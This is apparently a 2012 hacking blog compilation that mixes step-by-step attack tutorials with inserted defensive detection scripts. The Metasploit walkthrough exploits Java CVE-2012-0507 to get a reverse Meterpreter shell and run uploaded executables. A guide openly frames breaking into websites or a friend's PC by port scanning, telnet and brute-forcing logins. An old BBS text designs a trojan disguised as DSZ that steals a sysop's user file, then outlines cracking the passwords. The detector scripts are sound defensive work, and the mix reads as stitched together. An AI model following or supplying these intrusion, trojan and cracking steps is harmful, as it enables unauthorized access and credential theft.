
Monday, 8 October 2012

How To Get User Name and Password (Remote PC With IP)

     Once you have the IP addresses of some computers on your network, you can use command-line tools such as PsExec or PsLoggedOn, which take an IP address as input and report the user name of the currently logged-on user. Here is one such tool, PsLoggedOn.

     You can determine who is using resources on your local computer with the "net" command ("net session"), however, there is no built-in way to determine who is using the resources of a remote computer. In addition, NT comes with no tools to see who is logged onto a computer, either locally or remotely. PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer, or a remote one. If you specify a user name instead of a computer, PsLoggedOn searches the computers in the network neighborhood and tells you if the user is currently logged on.
     PsLoggedOn's definition of a locally logged on user is one that has their profile loaded into the Registry, so PsLoggedOn determines who is logged on by scanning the keys under the HKEY_USERS key. For each key whose name is a user SID (Security Identifier), PsLoggedOn looks up the corresponding user name and displays it. To determine who is logged onto a computer via resource shares, PsLoggedOn uses the NetSessionEnum API. Note that PsLoggedOn will show you as logged on via resource share to the remote computers that you query, because a logon is required for PsLoggedOn to access the Registry of a remote system.

You can also use the command below:

wmic.exe /node:IP-or-HostName ComputerSystem Get UserName

Example:

wmic.exe /node:172.28.1.100 ComputerSystem Get UserName

Output:
UserName
DOMAIN\User
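As an added example (not from the original post and not part of the Sysinternals tools), here is the defender's view of these queries. Both PsLoggedOn and wmic /node need a network logon on the queried host, and PsLoggedOn's registry scan and NetSessionEnum call arrive over the IPC$ share as the named pipes winreg and srvsvc, so the queried host's own Security log records the activity. The script correlates Security events 4624 and 5145; the event records, addresses and time window are constructed for the demonstration.

```python
"""Correlate the traces left on a host by remote logged-on-user queries.

Added example; not part of the original post or of the Sysinternals tools.
PsLoggedOn reads HKEY_USERS through the remote registry service and calls
NetSessionEnum; wmic /node queries WMI remotely. Each of these first needs
a network logon on the queried host (Security event 4624, LogonType 3),
and the remote registry and server-service RPC calls additionally travel
over the IPC$ share as the named pipes "winreg" and "srvsvc" (event 5145,
logged only when the 'Audit Detailed File Share' subcategory is enabled).
Seeing both from one source in a short window is the host-side footprint
of the queries described above. Event records below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, flattened to the fields this check needs
# (field names follow the real 4624/5145 schemas; values are made up).
SAMPLE_EVENTS = [
    {"time": "2012-10-08T09:00:01", "EventID": 4624, "LogonType": 3,
     "IpAddress": "172.28.1.50", "TargetUserName": "admin"},
    {"time": "2012-10-08T09:00:02", "EventID": 5145, "IpAddress": "172.28.1.50",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "winreg"},
    {"time": "2012-10-08T09:00:02", "EventID": 5145, "IpAddress": "172.28.1.50",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc"},
    # Ordinary file-share use: a network logon but no enumeration pipes.
    {"time": "2012-10-08T09:05:00", "EventID": 4624, "LogonType": 3,
     "IpAddress": "172.28.1.77", "TargetUserName": "alice"},
    {"time": "2012-10-08T09:05:01", "EventID": 5145, "IpAddress": "172.28.1.77",
     "ShareName": "\\\\*\\Shared", "RelativeTargetName": "report.docx"},
    # A pipe access with no network logon from that source in the window.
    {"time": "2012-10-08T11:00:00", "EventID": 5145, "IpAddress": "172.28.1.90",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc"},
]

ENUM_PIPES = {"winreg", "srvsvc"}  # remote registry; NetSessionEnum et al.
WINDOW = timedelta(seconds=60)


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def find_remote_enumeration(events, window=WINDOW):
    """Return {source_ip: [pipes]} for sources that obtained a network logon
    (4624, type 3) and within `window` opened an IPC$ enumeration pipe
    (5145). Both conditions are required, so plain share use is ignored."""
    logons = defaultdict(list)  # source ip -> times of type-3 logons
    for e in events:
        if e["EventID"] == 4624 and e.get("LogonType") == 3:
            logons[e["IpAddress"]].append(_ts(e["time"]))

    hits = defaultdict(set)
    for e in events:
        if e["EventID"] != 5145 or not e["ShareName"].endswith("\\IPC$"):
            continue
        pipe = e["RelativeTargetName"].lower()
        if pipe not in ENUM_PIPES:
            continue
        t, ip = _ts(e["time"]), e["IpAddress"]
        if any(timedelta(0) <= t - lt <= window for lt in logons.get(ip, [])):
            hits[ip].add(pipe)
    return {ip: sorted(pipes) for ip, pipes in hits.items()}


if __name__ == "__main__":
    for ip, pipes in find_remote_enumeration(SAMPLE_EVENTS).items():
        print(f"remote enumeration from {ip}: pipes {', '.join(pipes)}")
```

On the sample data only 172.28.1.50 is reported, with both pipes: the file-share user never touches IPC$ enumeration pipes, and the lone srvsvc access from 172.28.1.90 has no matching network logon in the window. In a real deployment the records come from the Security log export; the 5145 events exist only if detailed file-share auditing is turned on, which is the first thing to check.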
 
Download PsLoggedOn
 

How To Remote Computer Using Metasploit

Whenever someone says "PenTesting tool", the first thing that comes to mind is Metasploit. Today, I am going to demonstrate how to use Metasploit to exploit the popular Java AtomicReferenceArray Type Violation vulnerability (CVE-2012-0507).

    About Metasploit:
    Metasploit is a very powerful PenTesting tool. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. It is very useful for information gathering, vulnerability scanning, exploit development, client-side exploits, and more.

Mastering the Framework: A free course from Offensive-Security
The Offensive Security team, along with several active community members, made a free course on the Metasploit Framework, "Mastering the Framework". The course covers information gathering, social engineering attacks, exploit development, advanced AV avoidance, and more.

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

    Donate to HFC, Feed a Child!
    "Mastering the Framework" is a free course. If you enjoyed the course, please donate to Hackers for Charity (HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is sent directly to Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

    You can find further details about the donation here:
    http://www.offensive-security.com/metasploit-unleashed/Donate


Hey, where are you going?! Wait a second, take that course once I have demonstrated how to use Metasploit, because it will be hard to understand, or boring, if you read those things directly.

Requirements:

    VirtualBox
    Target OS(windows,...)
    PenTesting Distro(Backtrack )
    JRE 6(unpatched version)


CVE-2012-0507 is a vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the array is of the expected Object[] type. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.

    Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, the Flashback malware infected more than 600,000 Mac computers by exploiting this vulnerability. Recently, the INSS and Amnesty International UK websites were injected with malicious code that exploits CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox. I have set up two virtual machines, named "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in 'BT5'.

(Need help configuring the VMs? Read this: Setup PenTesting Lab.)

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is a recent vulnerability, you have to update the MSF before proceeding further.

    Slow Internet connection? If you have a slow Internet connection, you can download the java_atomicreferencearray module alone instead of updating all modules.
    Download java_atomicreferencearray.rb and paste it into the folder "/opt/metasploit/msf3/modules/exploits/multi/browser/".

    Then download CVE-2012-0507.jar and paste it into the folder "/opt/metasploit/msf3/data/exploits/".


Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:


Step 1:
Open the Terminal and type "msfconsole". This will bring up the Metasploit console, where you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray". This command selects the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display which settings are available and/or required for this specific module.



Now type "set SRVPORT 80"
and "set URIPATH /".



Step 3: Set Payload
Type "show payloads"; this displays the list of payloads. We are going to use the 'reverse_tcp' payload, which makes the Target open a reverse TCP connection back to the PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address]: in order to get the reverse connection, we have to set our IP in LHOST.

Open the Terminal and type "ifconfig". This will display the IP information of our PenTesting machine. The IP will be "192.168.56.x". For instance, let me say the IP is 192.168.56.10.

Now type "set LHOST 192.168.56.10" in the msfconsole.



Part IV: Breaching the Target Machine:

So, are you ready?! Let us break into the Target machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler on our machine and wait for anyone to connect to our HTTP server (e.g. http://192.168.56.10). Once the victim connects to our server, it sends a JAR file that exploits the CVE-2012-0507 vulnerability.

Step 2:

Open Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
It loads nothing, but the exploit runs in the background.

Step 3:
Switch to the BT5 machine, which will display the following output (screenshot in the original post):


Now type "sessions"; this shows the list of active sessions.

Type "sessions -i 1"; this opens the connection to the session with id '1' and brings you to Meterpreter. Meterpreter lets you interact with and control the Target.



Step 4: Upload files
Yeeeh..! We got a backdoor into the Target machine; now we can run any commands on the Target.



For example, typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files on the Target machine.

'upload /Test.exe c:\\': this command uploads Test.exe from the root ('file system' directory) of BT5 to the C drive of the Target.

'execute -f C:\\Test.exe': this command runs our uploaded file on the Target.


Security Tips:
Update your JRE to the latest version.
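The tip above is the fix; the detection side is worth a look too. As an added example (not from the original post and not part of Metasploit), here is a small proxy-log check: the set-up in this post serves a JAR from the root of a plain HTTP server on a bare IP, and the JRE fetches it with its own HTTP client, whose User-Agent reads "Java/1.6.0_29" and so reveals the exact build. The script flags JARs fetched by a Java user agent from hosts that are IP literals or not on an allowlist, and JRE builds older than the first fixed one. The log format, log lines and allowlist are constructed; the "first fixed build" table (Java 6 Update 31, Java 7 Update 3) is an assumption to be verified against the vendor advisory.

```python
"""Flag Java exploit-delivery patterns in web proxy logs and outdated JREs.

Added example; not part of the original post or of Metasploit. The post's
set-up serves a JAR from the root of a plain HTTP server on a bare IP
(SRVPORT 80, URIPATH /), and the JRE fetches it with its own HTTP client,
whose User-Agent has the form "Java/1.6.0_29". A proxy that logs the
User-Agent and Content-Type therefore sees the Java UA, the JAR response,
a destination that is an IP literal or not an allowlisted host, and the
client's exact JRE build.

The log format, log lines and allowlist are constructed for this example;
the "first fixed build" table is an assumption and should be set from the
vendor advisory.
"""
import re
from ipaddress import ip_address

# Constructed log format: time client "METHOD URL" status content-type "UA"
LOG_RE = re.compile(
    r'^(?P<time>\S+) (?P<client>\S+) "(?P<method>\w+) (?P<url>\S+)" '
    r'(?P<status>\d{3}) (?P<ctype>\S+) "(?P<ua>[^"]*)"$'
)
URL_RE = re.compile(r'^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/.*)?$')
JAVA_UA_RE = re.compile(r'^Java/(?P<ver>1\.\d+\.\d+(?:_\d+)?)')

SAMPLE_LOG = """\
2012-10-08T10:00:01 10.0.0.5 "GET http://192.168.56.10/" 200 text/html "Mozilla/5.0"
2012-10-08T10:00:02 10.0.0.5 "GET http://192.168.56.10/Exploit.jar" 200 application/java-archive "Java/1.6.0_29"
2012-10-08T10:01:00 10.0.0.6 "GET http://javadl.oracle.com/webapps/download/AutoDL" 200 application/octet-stream "Java/1.7.0_07"
2012-10-08T10:02:00 10.0.0.7 "GET http://intranet.example/app/client.jar" 200 application/java-archive "Java/1.6.0_33"
"""

# Constructed allowlist of hosts that may legitimately serve JARs.
ALLOWED_JAR_HOSTS = {"javadl.oracle.com", "intranet.example"}
# ASSUMPTION: first build per major version that contains the fix for
# CVE-2012-0507 (Java 6 Update 31 and Java 7 Update 3); verify against the
# vendor advisory before relying on it.
ASSUMED_FIXED = {6: (1, 6, 0, 31), 7: (1, 7, 0, 3)}


def parse_java_version(ua):
    """'Java/1.6.0_29' -> (1, 6, 0, 29); None for non-Java user agents."""
    m = JAVA_UA_RE.match(ua)
    if not m:
        return None
    main, _, update = m.group("ver").partition("_")
    parts = [int(x) for x in main.split(".")]
    parts.append(int(update) if update else 0)
    return tuple(parts)


def is_outdated(version, fixed=ASSUMED_FIXED):
    """True when the build is older than the first fixed build of its major."""
    if version is None:
        return False
    floor = fixed.get(version[1])
    return floor is not None and version < floor


def is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def scan_proxy_log(text, allowed_hosts=ALLOWED_JAR_HOSTS, fixed=ASSUMED_FIXED):
    """Return [(client_ip, dest_host, [reasons])] for suspicious Java requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        u = URL_RE.match(m.group("url"))
        if not u:
            continue
        version = parse_java_version(m.group("ua"))
        if version is None:
            continue  # only requests made by the JRE itself are of interest here
        host, path = u.group("host"), u.group("path") or "/"
        is_jar = (m.group("ctype") == "application/java-archive"
                  or path.lower().endswith(".jar"))
        reasons = []
        if is_jar and host not in allowed_hosts:
            reasons.append("jar from non-allowlisted host")
        if is_jar and is_ip_literal(host):
            reasons.append("jar from IP literal")
        if is_outdated(version, fixed):
            reasons.append("outdated JRE " + m.group("ua").split()[0])
        if reasons:
            findings.append((m.group("client"), host, reasons))
    return findings


if __name__ == "__main__":
    for client, host, reasons in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} -> {host}: {'; '.join(reasons)}")
```

On the constructed log only the second line is reported, for all three reasons; the Oracle update check and the intranet application JAR pass because their hosts are allowlisted and their builds are at or above the assumed fixed build. The version inventory alone is useful: every host whose JRE still requests anything through the proxy with an old build is a patching ticket.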


Conclusion:
I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability. I hope this will help you to get into the PenTesting world..!

Saturday, 6 October 2012

How To Remote Computer Using IP address


Literally, hacking is accessing something or somebody on the Internet without their permission or interest. In summary, hacking is a very easy job: it is like, instead of using the front door, finding the hidden door of a house and hijacking the precious things. Among all kinds of hacking, hacking via IP address is one of the most common yet powerful beginnings.

You may want to hack a website and put your advertisement there or grab some database information. In this type of hacking, you are playing with the web server's computer instead of the administrator's computer, because www.website.com is hosted on a separate web server rather than a personal computer.

Another case can be accessing your friend's computer from your home. Again this is IP based, and it is possible only when your friend's computer is online. If it is off or not connected to the Internet, then remote IP hacking is totally impossible.

Well, both kinds of hacking have the same process. Let's summarize what we must do.

    Confirm the website or computer you want to hack.
    Find or trace its IP address.
    Make sure that the IP address is online.
    Scan for open ports.
    Check for vulnerable ports.
    Access through the port.
    Brute-force the username and password.

Now let me describe the basic steps briefly, so that a child can understand them.
First, getting the IP address of the victim.
To get the IP address of the victim website, ping it in the command prompt.

For example,
ping www.google.com

will fetch the IP address of Google.com.


This is how we can get the IP address of the victim's website.

How about your friend's PC? You can't do www.yourfriend'sname.com, can you? Finding your friend's IP address is a little tougher job, and tougher still if he has a dynamic IP address that keeps changing.

One of the widely used methods to detect your friend's IP address is by chatting with him.

You might find this article helpful

    How to get the IP address using MSN/Yahoo/Pidgin messenger

Now you've got the IP address, right? Is it online?

To know the online status, just ping the IP address; if it is online, it will reply.

If the IP address is online, scan for open ports. Open ports are like closed doors without locks: you can go inside and outside easily.

Use Advanced Port Scanner to scan all open and vulnerable ports.

Now that you have the IP address and open port of the victim, you can use telnet to try to access it. Make sure that you have telnet enabled on your computer, or install it from Control Panel > Add/Remove Programs > Add Windows Components.

Now open the command prompt and use the telnet command to access the IP address. Use the following syntax for the connection.

telnet [IP address] [Port]

You’ll be asked to input login information.

If you can guess the information easily, then it's OK. Or you can use some brute-forcing tools like this one.

In this way you'll be able to hack a remote computer using only its IP address.
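The last two steps of this post (connect with telnet, then guess or brute-force the login) are what a host's own login service records, one failed-login line per guess. As an added example that is not part of the original post, here is the defender's counterpart: a sliding-window count of failures per source address that alerts when the rate exceeds anything a human typing errors could produce. The log lines and their format are constructed for the example; adjust the regex to the exact wording your login daemon emits.

```python
"""Detect password guessing against a telnet (or other) login service.

Added example, not part of the original post. The post's final steps are
to connect with telnet and then guess or brute-force the login. On the
host side each guess leaves a failed-login record, so the defensive
counterpart is to count failures per source address in a sliding window
and alert when they exceed what a human typo rate could produce.
The log lines and their format are constructed for this example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed syslog-style lines from a login service.
SAMPLE_LOG = """\
Oct  6 12:00:01 host login[401]: FAILED LOGIN FROM 203.0.113.5 FOR admin, Authentication failure
Oct  6 12:00:02 host login[402]: FAILED LOGIN FROM 203.0.113.5 FOR admin, Authentication failure
Oct  6 12:00:02 host login[403]: FAILED LOGIN FROM 203.0.113.5 FOR root, Authentication failure
Oct  6 12:00:03 host login[404]: FAILED LOGIN FROM 203.0.113.5 FOR administrator, Authentication failure
Oct  6 12:00:03 host login[405]: FAILED LOGIN FROM 203.0.113.5 FOR guest, Authentication failure
Oct  6 12:00:04 host login[406]: FAILED LOGIN FROM 203.0.113.5 FOR admin, Authentication failure
Oct  6 12:30:00 host login[500]: FAILED LOGIN FROM 198.51.100.9 FOR alice, Authentication failure
Oct  6 12:30:20 host login[501]: LOGIN ON pts/1 BY alice FROM 198.51.100.9
"""

# Matches the constructed format above; real login(1)/telnetd wording differs.
FAIL_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: '
    r'FAILED LOGIN FROM (?P<src>\S+) FOR (?P<user>\S+),'
)


def parse_failures(text, year=2012):
    """Yield (time, source_ip, username) for each failed-login line.
    Syslog lines carry no year, so it is supplied by the caller."""
    for line in text.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        yield ts, m.group("src"), m.group("user")


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: (failures_in_window, sorted usernames tried)} for
    sources that reach `threshold` failures inside any `window`-long span."""
    recent = defaultdict(deque)  # src -> timestamps still inside the window
    users = defaultdict(set)
    alerts = {}
    for ts, src, user in parse_failures(text):
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        users[src].add(user)
        if len(q) >= threshold:
            alerts[src] = (len(q), sorted(users[src]))
    return alerts


if __name__ == "__main__":
    for src, (count, names) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{src}: {count} failures in window, accounts tried: {', '.join(names)}")
```

On the sample lines 203.0.113.5 is reported (six failures in four seconds across four account names, the signature of a wordlist rather than a forgotten password) while 198.51.100.9, one failure followed by a success, is not. The detector is the short-term control; since telnet carries the login in clear text, the longer-term one is retiring it in favour of SSH and adding account lockout or rate limiting.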

Related news:

    Changing your IP Address
    Search the profile/people using their Email Address
    Get the larger image from Gravatar image icon
    How to get the IP address using MSN/Yahoo/Pidgin messenger
    Hacking and crashing website using IP

Thursday, 4 October 2012

(The REAL way to hack RemoteAccess)

             Well dewdz, ya seen the text file about hacking RemoteAccess and you wanna
crack that H/P or warez RA board for mega ratios?  Get Real!
Create a Social Network!


RA *CAN* be hacked but only in the same way as any other BBS sox...  no
sysop reading that file should've shat themselves... here's why not:

Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
that he'll run it on his system.  Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!

Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA...  Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures...       Lame Hacker 0 - Sysop 1

Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable.  How do they do that? (patronising Dez Lymon voice) <g>.

Their idea was to copy the file into D:\FILES\UPLOAD ..  Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!!                    Lame Hacker 0 - Sysop 2

Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next?  The file has to be d/lable...  you found a sysop that makes
UNCHECKED & UNSCANNED files available for download?  Fuck off!  Get a life!
                                                     Lame Hacker 0 - Sysop 3

So...  okay....  we got a sysop that's so fucking lame he doesn't deserve
to breathe the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable.  RA by default won't allow
files to be d/led UNLESS they're in the file database.  Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.

The way they "solved" this was to add an entry to FILES.BBS in the file
directory.  Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS ITS FILE
DATABASE.   Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL!         Lame Hacker 0 - Sysop 4
                                                     
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!

Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!!                       Lame Hacker :(  -  Sysop:-)


So how can U hack RA?  Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.

Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files...  that's very
helpful of the sysop, to show us where we can find his config files. <g>

In the RA system directory should be the file CONFIG.RA.  You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.

I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts.  This is the path where USERS.BBS will be found.

Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.

I suggest you do this in one of three ways:

1)  Interrogate the file FILES.RA in the RA system directory which contains
    the filebase area configs.  You *could* just search the directory for a
    valid path but you wouldn't know if you had d/l access to the area. 

2)  If you want to be a bit more clever you could interpret the file and
    find out the minimum security level required to d/l from each area and
    dump your copy of USERS.BBS in the area with the lowest access level,
    pretty much guaranteeing that you'll be able to get to the file.  This
    doesn't take security flags into account so there's still a SLIM
    possibility you won't be able to d/l the file unless you also write flag
    testing into your program.

3)  My favourite technique is to have the program read a small config file
    which is uploaded with your archive.  This file just contains the name
    of a file you KNOW you have d/l access from.  You can then either do a
    global search for that filename or, preferably (coz it's faster) read
    FILES.RA for the paths used by the filebase and search those.

So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file.  However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why?  Because
it's not in the filearea database.

You could get clever and find and amend the filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.

There *is* an easier way.  Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".

E.g. the BASIC command would be:

             SHELL "RAFILE ADOPT "+filename$+STR$(areanum)

Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number.  If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:

             RAFILE ADOPT USERTEST.ZIP 10

This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).

All you need to do now is to package this trojan file to entice the sysop
into running it...  In the LAME method for hacking RA the author used DSZ
as an example.  That was about the most realistic part of the file and the
only bit worth leaching!  <g>


Your archive:
                DSZ.EXE (your program)
                DSZ.DAT (the *real* DSZ.EXE)
                DSZ.CFG (small file containing the name of a *known*
                         d/lable file - preferably encrypted)
                + any other files that normally come with DSZ


               
Flow diagram for DSZ.EXE trojan:

                            _______ 
                           /       \
                          |  Start  |
                           \_______/
                               |
                               |
                      +--------+--------+
                      | Read environment|
                      |   variable RA   |
                      +--------+--------+
                               |
                               |
                              / \
                            /     \
                          /CONFIG.RA\          +---------------------+
                        /  exist in   \___>____| Scan drives & paths |
                        \  that path  / No     | search for the file |
                          \    ?    /          +----------+----------+
                            \     /                       |
                              \ /                         |
                           Yes |                          |
                               +------------<-------------+
                               |
                      +--------+--------+
                      | Read CONFIG.RA  |
                      | to get location |
                      |   of USERS.BBS  |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Read DSZ.CFG to |
                      | get a filename  |
                      +--------+--------+
                               |_____________<____________
                               |                          |
                      +--------+--------+                 |
                      | Read FILES.RA to|                 |
                      | get name of the |                 |
                      |  next filearea  |                 |
                      +--------+--------+                 |
                               |                          |
                               |                          |
                              / \                         |
                            /     \                       |
                          /does area\                     |
                        / contain the \________>__________|
                        \     file    / No
                          \    ?    /
                            \     /                      
                              \ /                        
                           Yes |                         
                               |
                      +--------+--------+
                      | Copy USERS.BBS  |
                      | to the filearea |
                      |    directory    |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Run RAFILE with |
                      | ADOPT to update |
                      |   RA database   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Delete DSZ.EXE  |
                      |   and DSZ.CFG   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Rename DSZ.DAT  |
                      |   to DSZ.EXE    |
                      +--------+--------+
                               |
                            ___|___ 
                           /       \
                          |  Stop!  |
                           \_______/
                             
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is.  Wait a day or so and dial
back.  Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it. 

The next step, now you have the USERS.BBS file, is to crack the passwords. 
I only know of ONE crack program out there which has the RA password
encryption algorithm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK.  This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.

RA-CRACK takes its source words from a text file so it would be possible
to either:

 a)  Use a TXT dictionary file as the source.  All passwords that are
     normal words will be found.  This method will usually find about 90%
     of the user passwords.

 b)  Write a "brute force" cracker using a small routine that "counts"
     through valid ASCII character combinations from "!" (ASCII 33) up to
     a string containing 25 (max length of a RA password) null characters
     (ASCII 255), passing these via a text file to RA-CRACK.  This SHOULD
     be _100%_ successful, but SLOW!